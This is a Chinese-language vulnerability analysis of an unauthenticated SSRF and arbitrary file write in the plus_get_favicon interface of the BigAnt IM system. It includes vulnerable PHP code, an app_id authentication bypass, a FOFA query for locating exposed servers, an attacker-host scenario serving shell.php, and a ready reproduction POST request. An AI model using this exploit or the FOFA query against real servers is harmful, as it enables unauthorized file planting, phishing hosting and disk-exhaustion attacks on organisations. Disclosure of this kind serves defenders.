漏洞简介
杭州九麒科技大蚂蚁 (BigAnt) 即时通讯系统是一款企业级IM通信管理系统,提供多种功能支持。该系统的 plus_get_favicon 接口存在任意文件写入/上传漏洞,攻击者可以通过上传特制的 php 文件,执行恶意代码,实现服务器的远程控制,可能导致敏感信息泄露、数据篡改等危害。
影响版本
BigAnt 5.5.x 及以上版本用户

经过测试,最新版本 6.0.1.20250407.1 也受影响
fofa语法
(body="/Public/static/admin/admin_common.js" && body="/Public/lang/zh-cn.js.js") || title="即时通讯 系统登录" && body="/Public/static/ukey/Syunew3.js"
漏洞分析
直接看下 Application/Admin/Controller/PlusController.class.php 的实现逻辑

最开始的初始化部分定义了如果app_id=pc_clientz 那么就不需要鉴权.
再看 plus_get_favicon() 方法的实现逻辑
public function plus_get_favicon(){
$plus_uri = I("plus_uri");
if(!$plus_uri){
Jump::errror(3002,"not found the plus_uri");
}
// 得到 host
$parse_url = parse_url($plus_uri);
$newUrl = sprintf("%s://%s:%d", $parse_url['scheme'], $parse_url['host'], $parse_url['port']);
$content = file_get_contents($newUrl);
if(preg_match("/rel=\".*icon\".+href=\"(.*)\"/U", $content, $match) === false){
Jump::errror(3002,"not found the preg_match");
}
if(empty($match[1])){
Jump::errror(3002,"not found the \$match[1]");
}
$img_url = $match[1];
$dir =\Common\Lib\SaasSDK::getStoragePath(sp_saas_id(),'plus_favicon') ;
sp_folder_create(SITE_PATH.$dir);
$ext= substr($img_url,strrpos($img_url,'.'));
$filepath=$dir.md5($img_url).$ext;
$file_get_contents = file_get_contents($newUrl.$img_url);
file_put_contents(SITE_PATH.$filepath, $file_get_contents);
$data['img_url']=$filepath;
Jump::success($data);
}
首先用户通过 plus_uri 参数输入一个完全可控的 URL,然后进行处理:
- URL 解析与重组: 程序使用
parse_url拆解输入,并用sprintf重新拼接成$newUrl。- 语义展开: 如果用户输入
http://attacker.com:80/exploit,$newUrl会被格式化为http://attacker.com:80。注意这里强制要求了端口,如果用户不提供端口,sprintf的%d可能会导致非预期的结果(如 0),但攻击者只需显式提供端口(如 :80)即可绕过。
- 语义展开: 如果用户输入
- 第一次 SSRF:
file_get_contents($newUrl)发起请求,获取攻击者控制的页面内容$content。 - 正则提取:
preg_match("/rel=\".*icon\".+href=\"(.*)\"/U", $content, $match)。- 语义展开: 攻击者在自己的页面中准备如下内容:
<link rel="icon" href="/shell.php">。正则会成功匹配,并将$match[1]赋值为/shell.php。
- 语义展开: 攻击者在自己的页面中准备如下内容:
- 后缀名提取:
$ext = substr($img_url, strrpos($img_url, '.'));- 语义展开:
strrpos查找/shell.php中最后一个.的位置。substr从该位置截取到末尾,结果为.php。程序完全没有检查这个后缀是否合法(如是否为 jpg/png)。
- 语义展开:
- 第二次 SSRF:
$file_get_contents = file_get_contents($newUrl.$img_url);- 语义展开: 服务器再次请求
http://attacker.com:80/shell.php,获取攻击者预设的 PHP 木马内容。
- 语义展开: 服务器再次请求
代码直接通过 substr 提取原始链接中的后缀,并直接拼接到本地文件名中,未做任何白名单限制,从而导致任意文件上传漏洞。
但是由于Apache服务器配置中存在如下内容

有针对data目录的php_admin_flag engine off配置,表示data目录禁止解析php,因此不能解析。但是可以上传html文件钓鱼或者作为恶意文件托管等、或者特别大的文件消耗磁盘容量造成因磁盘容量耗尽的DOS等危害,也是不容小觑。
漏洞复现
需要注意thinkphp的路由特性,不区分大小写,且还支持如下等方式
/api/dispersedOrg/plus_get_favicon.html
/api/dispersedOrg/plus_get_favicon

在本地http服务的默认首页如 index.html 文件内容包含 <link rel="icon" href="/del.php"> 这种可以通过正则校验以及测试文件del.php的内容。
POST /?m=Admin&c=Plus&a=plus_get_favicon HTTP/1.1
Host: bigant.mrxn.net
Content-Type: application/x-www-form-urlencoded
plus_uri=http://127.0.0.1:80&app_id=pc_client

如上图所示,我们成功上传文件到/data/plus_favicon/目录下。


